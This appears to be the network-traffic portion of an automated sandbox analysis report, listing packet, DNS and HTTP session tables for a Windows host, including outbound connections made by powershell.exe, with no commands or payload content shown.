Sep 30, 2024 18:59:14.996131897 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:59:14.996143103 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:59:14.996175051 CEST | 49725 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:59:14.996256113 CEST | 49725 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:59:14.997459888 CEST | 49725 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:59:14.997477055 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:59:14.997492075 CEST | 49725 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:59:14.997497082 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:59:16.685651064 CEST | 443 | 49717 | 104.98.116.138 | 192.168.2.7 |
Sep 30, 2024 18:59:16.685714006 CEST | 49717 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:59:30.596120119 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:30.596178055 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:30.596256971 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:30.596621990 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:30.596633911 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:31.734653950 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:31.747262955 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:31.747289896 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:31.747797012 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:31.748100042 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:31.748167992 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:31.797209978 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:41.640319109 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:41.640403986 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:59:41.640568018 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:42.584300995 CEST | 49727 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:59:42.584331036 CEST | 443 | 49727 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 19:00:07.142864943 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Sep 30, 2024 19:00:07.148276091 CEST | 80 | 49702 | 172.67.132.65 | 192.168.2.7 |
Sep 30, 2024 19:00:07.148375034 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 30, 2024 18:58:17.636629105 CEST | 123 | 123 | 192.168.2.7 | 20.101.57.9 |
Sep 30, 2024 18:58:17.809326887 CEST | 123 | 123 | 20.101.57.9 | 192.168.2.7 |
Sep 30, 2024 18:58:19.708942890 CEST | 60232 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:19.736762047 CEST | 53 | 60232 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.879631996 CEST | 60233 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:22.886416912 CEST | 53 | 60233 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.890319109 CEST | 60234 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:22.898044109 CEST | 53 | 60234 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.900959969 CEST | 60235 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:22.908229113 CEST | 53 | 60235 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.968064070 CEST | 60236 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:22.977456093 CEST | 53 | 60236 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.979855061 CEST | 60237 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:22.990200043 CEST | 53 | 60237 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:22.993117094 CEST | 60238 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:23.003952026 CEST | 53 | 60238 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:25.382898092 CEST | 55536 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:25.820085049 CEST | 53 | 55536 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:26.202284098 CEST | 63102 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:26.203921080 CEST | 61046 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:26.210859060 CEST | 53 | 58167 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:26.221546888 CEST | 53 | 49805 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:26.378424883 CEST | 53 | 61046 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:26.391805887 CEST | 53 | 63102 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:27.352183104 CEST | 53 | 60154 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:30.534493923 CEST | 57090 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:30.534674883 CEST | 54564 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:30.541722059 CEST | 53 | 57090 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:30.542982101 CEST | 53 | 54564 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:31.119193077 CEST | 62904 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:31.301826954 CEST | 53 | 62904 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:35.778315067 CEST | 49282 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:35.954905033 CEST | 53 | 49282 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:40.878232002 CEST | 57564 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:40.887160063 CEST | 53 | 57564 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:44.458796978 CEST | 53 | 56190 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:58:59.548046112 CEST | 61006 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:58:59.555881023 CEST | 53 | 61006 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:03.494328976 CEST | 53 | 61162 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:11.897355080 CEST | 138 | 138 | 192.168.2.7 | 192.168.2.255 |
Sep 30, 2024 18:59:18.643251896 CEST | 60352 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:59:18.653446913 CEST | 53 | 60352 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:25.782953978 CEST | 53 | 51502 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:25.978931904 CEST | 53 | 63292 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:39.251396894 CEST | 51637 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 18:59:39.258517981 CEST | 53 | 51637 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 18:59:54.446173906 CEST | 53 | 59256 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:00:09.534959078 CEST | 61867 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 19:00:09.542581081 CEST | 53 | 61867 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:00:40.369018078 CEST | 53 | 58441 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:00:55.441621065 CEST | 64809 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 19:00:55.448606968 CEST | 53 | 64809 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:01:21.220726013 CEST | 54503 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 19:01:21.229494095 CEST | 53 | 54503 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:01:56.416773081 CEST | 53 | 63709 | 1.1.1.1 | 192.168.2.7 |
Sep 30, 2024 19:02:11.486885071 CEST | 49349 | 53 | 192.168.2.7 | 1.1.1.1 |
Sep 30, 2024 19:02:11.495424986 CEST | 53 | 49349 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Sep 30, 2024 18:58:19.744822025 CEST | 192.168.2.7 | 104.22.15.154 | 4d5a | Echo | |
Sep 30, 2024 18:58:19.751045942 CEST | 104.22.15.154 | 192.168.2.7 | 555a | Echo Reply | |
Sep 30, 2024 18:58:20.750298023 CEST | 192.168.2.7 | 104.22.15.154 | 4d59 | Echo | |
Sep 30, 2024 18:58:20.756638050 CEST | 104.22.15.154 | 192.168.2.7 | 5559 | Echo Reply | |
Sep 30, 2024 18:58:21.765928984 CEST | 192.168.2.7 | 104.22.15.154 | 4d58 | Echo | |
Sep 30, 2024 18:58:21.772416115 CEST | 104.22.15.154 | 192.168.2.7 | 5558 | Echo Reply | |
Sep 30, 2024 18:58:22.781742096 CEST | 192.168.2.7 | 104.22.15.154 | 4d57 | Echo | |
Sep 30, 2024 18:58:22.788064003 CEST | 104.22.15.154 | 192.168.2.7 | 5557 | Echo Reply |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 30, 2024 18:58:19.708942890 CEST | 192.168.2.7 | 1.1.1.1 | 0x6c9a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.879631996 CEST | 192.168.2.7 | 1.1.1.1 | 0x1 | Standard query (0) | PTR (Pointer record) | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.890319109 CEST | 192.168.2.7 | 1.1.1.1 | 0x2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.900959969 CEST | 192.168.2.7 | 1.1.1.1 | 0x3 | Standard query (0) | 28 | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.968064070 CEST | 192.168.2.7 | 1.1.1.1 | 0x1 | Standard query (0) | PTR (Pointer record) | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.979855061 CEST | 192.168.2.7 | 1.1.1.1 | 0x2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:22.993117094 CEST | 192.168.2.7 | 1.1.1.1 | 0x3 | Standard query (0) | 28 | IN (0x0001) | false | |
Sep 30, 2024 18:58:25.382898092 CEST | 192.168.2.7 | 1.1.1.1 | 0xa5d2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:26.202284098 CEST | 192.168.2.7 | 1.1.1.1 | 0xf1a3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:26.203921080 CEST | 192.168.2.7 | 1.1.1.1 | 0xed39 | Standard query (0) | 65 | IN (0x0001) | false | |
Sep 30, 2024 18:58:30.534493923 CEST | 192.168.2.7 | 1.1.1.1 | 0x121d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:30.534674883 CEST | 192.168.2.7 | 1.1.1.1 | 0x7c9a | Standard query (0) | 65 | IN (0x0001) | false | |
Sep 30, 2024 18:58:31.119193077 CEST | 192.168.2.7 | 1.1.1.1 | 0x6f98 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:35.778315067 CEST | 192.168.2.7 | 1.1.1.1 | 0x68ad | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:40.878232002 CEST | 192.168.2.7 | 1.1.1.1 | 0xcfb9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:58:59.548046112 CEST | 192.168.2.7 | 1.1.1.1 | 0x530d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:59:18.643251896 CEST | 192.168.2.7 | 1.1.1.1 | 0xc4fd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 18:59:39.251396894 CEST | 192.168.2.7 | 1.1.1.1 | 0xe207 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 19:00:09.534959078 CEST | 192.168.2.7 | 1.1.1.1 | 0x88df | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 19:00:55.441621065 CEST | 192.168.2.7 | 1.1.1.1 | 0x7529 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 19:01:21.220726013 CEST | 192.168.2.7 | 1.1.1.1 | 0x3438 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 30, 2024 19:02:11.486885071 CEST | 192.168.2.7 | 1.1.1.1 | 0x1de9 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 30, 2024 18:58:19.736762047 CEST | 1.1.1.1 | 192.168.2.7 | 0x6c9a | No error (0) | 104.22.15.154 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:19.736762047 CEST | 1.1.1.1 | 192.168.2.7 | 0x6c9a | No error (0) | 104.22.14.154 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:19.736762047 CEST | 1.1.1.1 | 192.168.2.7 | 0x6c9a | No error (0) | 172.67.30.179 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:22.886416912 CEST | 1.1.1.1 | 192.168.2.7 | 0x1 | No error (0) | PTR (Pointer record) | IN (0x0001) | false | |||
Sep 30, 2024 18:58:22.898044109 CEST | 1.1.1.1 | 192.168.2.7 | 0x2 | No error (0) | me-ycpi-cf-www.g06.yahoodns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:22.898044109 CEST | 1.1.1.1 | 192.168.2.7 | 0x2 | No error (0) | 87.248.119.251 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:22.898044109 CEST | 1.1.1.1 | 192.168.2.7 | 0x2 | No error (0) | 87.248.119.252 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:22.908229113 CEST | 1.1.1.1 | 192.168.2.7 | 0x3 | No error (0) | me-ycpi-cf-www.g06.yahoodns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:22.908229113 CEST | 1.1.1.1 | 192.168.2.7 | 0x3 | No error (0) | 28 | IN (0x0001) | false | |||
Sep 30, 2024 18:58:22.908229113 CEST | 1.1.1.1 | 192.168.2.7 | 0x3 | No error (0) | 28 | IN (0x0001) | false | |||
Sep 30, 2024 18:58:22.977456093 CEST | 1.1.1.1 | 192.168.2.7 | 0x1 | No error (0) | PTR (Pointer record) | IN (0x0001) | false | |||
Sep 30, 2024 18:58:22.990200043 CEST | 1.1.1.1 | 192.168.2.7 | 0x2 | No error (0) | 185.70.42.31 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:25.820085049 CEST | 1.1.1.1 | 192.168.2.7 | 0xa5d2 | No error (0) | 172.67.132.65 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:25.820085049 CEST | 1.1.1.1 | 192.168.2.7 | 0xa5d2 | No error (0) | 104.21.4.163 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:26.391805887 CEST | 1.1.1.1 | 192.168.2.7 | 0xf1a3 | No error (0) | 203.101.184.118 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:30.541722059 CEST | 1.1.1.1 | 192.168.2.7 | 0x121d | No error (0) | 142.250.186.36 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:30.542982101 CEST | 1.1.1.1 | 192.168.2.7 | 0x7c9a | No error (0) | 65 | IN (0x0001) | false | |||
Sep 30, 2024 18:58:31.301826954 CEST | 1.1.1.1 | 192.168.2.7 | 0x6f98 | No error (0) | 172.67.149.9 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:31.301826954 CEST | 1.1.1.1 | 192.168.2.7 | 0x6f98 | No error (0) | 104.21.29.133 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:35.954905033 CEST | 1.1.1.1 | 192.168.2.7 | 0x68ad | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:35.954905033 CEST | 1.1.1.1 | 192.168.2.7 | 0x68ad | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:40.887160063 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfb9 | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:40.887160063 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfb9 | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:40.887160063 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfb9 | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:40.887160063 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfb9 | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:40.887160063 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfb9 | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:59.555881023 CEST | 1.1.1.1 | 192.168.2.7 | 0x530d | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:59.555881023 CEST | 1.1.1.1 | 192.168.2.7 | 0x530d | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:59.555881023 CEST | 1.1.1.1 | 192.168.2.7 | 0x530d | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:59.555881023 CEST | 1.1.1.1 | 192.168.2.7 | 0x530d | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:58:59.555881023 CEST | 1.1.1.1 | 192.168.2.7 | 0x530d | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:18.653446913 CEST | 1.1.1.1 | 192.168.2.7 | 0xc4fd | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:18.653446913 CEST | 1.1.1.1 | 192.168.2.7 | 0xc4fd | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:18.653446913 CEST | 1.1.1.1 | 192.168.2.7 | 0xc4fd | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:18.653446913 CEST | 1.1.1.1 | 192.168.2.7 | 0xc4fd | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:18.653446913 CEST | 1.1.1.1 | 192.168.2.7 | 0xc4fd | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:39.258517981 CEST | 1.1.1.1 | 192.168.2.7 | 0xe207 | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:39.258517981 CEST | 1.1.1.1 | 192.168.2.7 | 0xe207 | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:39.258517981 CEST | 1.1.1.1 | 192.168.2.7 | 0xe207 | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:39.258517981 CEST | 1.1.1.1 | 192.168.2.7 | 0xe207 | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 18:59:39.258517981 CEST | 1.1.1.1 | 192.168.2.7 | 0xe207 | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:09.542581081 CEST | 1.1.1.1 | 192.168.2.7 | 0x88df | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:09.542581081 CEST | 1.1.1.1 | 192.168.2.7 | 0x88df | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:09.542581081 CEST | 1.1.1.1 | 192.168.2.7 | 0x88df | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:09.542581081 CEST | 1.1.1.1 | 192.168.2.7 | 0x88df | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:09.542581081 CEST | 1.1.1.1 | 192.168.2.7 | 0x88df | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:55.448606968 CEST | 1.1.1.1 | 192.168.2.7 | 0x7529 | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:55.448606968 CEST | 1.1.1.1 | 192.168.2.7 | 0x7529 | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:55.448606968 CEST | 1.1.1.1 | 192.168.2.7 | 0x7529 | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:55.448606968 CEST | 1.1.1.1 | 192.168.2.7 | 0x7529 | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:00:55.448606968 CEST | 1.1.1.1 | 192.168.2.7 | 0x7529 | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:01:21.229494095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3438 | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:01:21.229494095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3438 | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:01:21.229494095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3438 | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:01:21.229494095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3438 | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:01:21.229494095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3438 | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:02:11.495424986 CEST | 1.1.1.1 | 192.168.2.7 | 0x1de9 | No error (0) | 162.159.130.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:02:11.495424986 CEST | 1.1.1.1 | 192.168.2.7 | 0x1de9 | No error (0) | 162.159.134.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:02:11.495424986 CEST | 1.1.1.1 | 192.168.2.7 | 0x1de9 | No error (0) | 162.159.136.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:02:11.495424986 CEST | 1.1.1.1 | 192.168.2.7 | 0x1de9 | No error (0) | 162.159.133.234 | A (IP address) | IN (0x0001) | false | ||
Sep 30, 2024 19:02:11.495424986 CEST | 1.1.1.1 | 192.168.2.7 | 0x1de9 | No error (0) | 162.159.135.234 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49702 | 172.67.132.65 | 80 | 5140 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 30, 2024 18:58:26.199614048 CEST | 197 | OUT | |
Sep 30, 2024 18:58:26.976491928 CEST | 1044 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49714 | 172.67.149.9 | 80 | 7884 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 30, 2024 18:58:31.315795898 CEST | 176 | OUT | |
Sep 30, 2024 18:58:31.779834986 CEST | 861 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49719 | 188.114.97.3 | 80 | 8136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 30, 2024 18:58:35.969408035 CEST | 172 | OUT | |
Sep 30, 2024 18:58:36.444175005 CEST | 847 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49707 | 203.101.184.118 | 443 | 1928 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:27 UTC | 661 | OUT | |
2024-09-30 16:58:27 UTC | 541 | IN | |
2024-09-30 16:58:27 UTC | 527 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49706 | 203.101.184.118 | 443 | 1928 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:28 UTC | 603 | OUT | |
2024-09-30 16:58:28 UTC | 426 | IN | |
2024-09-30 16:58:28 UTC | 527 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49715 | 172.67.149.9 | 443 | 7884 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:32 UTC | 176 | OUT | |
2024-09-30 16:58:33 UTC | 843 | IN | |
2024-09-30 16:58:33 UTC | 235 | IN | |
2024-09-30 16:58:33 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.7 | 49718 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:36 UTC | 306 | OUT | |
2024-09-30 16:58:36 UTC | 560 | IN | |
2024-09-30 16:58:36 UTC | 15824 | IN | |
2024-09-30 16:58:36 UTC | 8666 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.7 | 49721 | 188.114.97.3 | 443 | 8136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:36 UTC | 172 | OUT | |
2024-09-30 16:58:37 UTC | 614 | IN | |
2024-09-30 16:58:37 UTC | 755 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN | |
2024-09-30 16:58:37 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.7 | 49724 | 162.159.135.234 | 443 | 8136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:58:41 UTC | 187 | OUT | |
2024-09-30 16:58:41 UTC | 612 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.7 | 49725 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-30 16:59:14 UTC | 306 | OUT | |
2024-09-30 16:59:14 UTC | 560 | IN | |
2024-09-30 16:59:14 UTC | 15824 | IN | |
2024-09-30 16:59:14 UTC | 14181 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 12:58:17 |
